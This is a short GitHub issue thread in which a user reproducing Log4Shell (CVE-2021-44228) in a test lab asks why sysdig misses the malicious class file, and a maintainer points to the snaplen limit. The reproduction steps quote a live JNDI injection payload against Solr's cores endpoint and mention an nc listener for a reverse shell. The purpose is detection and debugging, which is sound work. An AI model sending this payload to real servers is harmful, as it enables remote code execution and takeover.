Closed ch3n9w closed 1 year ago
Hi @ch3n9w! Capturing the I/O operations is very costly. For this reason the snaplen is limited to 80 bytes by default. Try increasing it using the --snaplen
flag 😄
@therealbobo Oh! Thank you, I was just wondering why falco can't detect CVE-2021-44228 with its rules, thank you for saving my weekend!
When I reproduced CVE-2021-44228 and tried to capture network traffic with sysdig following this blog, I can't capture class file in %evt.buffer.
sysdig version 0.31.5 OS: Linux version 5.4.0-148-generic (buildd@lcy02-amd64-112) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1))
Step to reproduce:
setup a testing environment with vulhub
setup a RMI server with JNDI-Injection-Exploit, and launch nc to wait for reverse shell.
send payload to perform JDNI attack, like
/solr/admin/cores?action=${jndi:rmi://192.168.31.14:1099/isjqzm}
watch nc receive reverse shell connection, while the output of sysdig doesn't contain
cafebabe
bytecode and malicious class file.the output
However, wireshark can capture the whole class file correctly:
Are there something I missing? What can I do to help?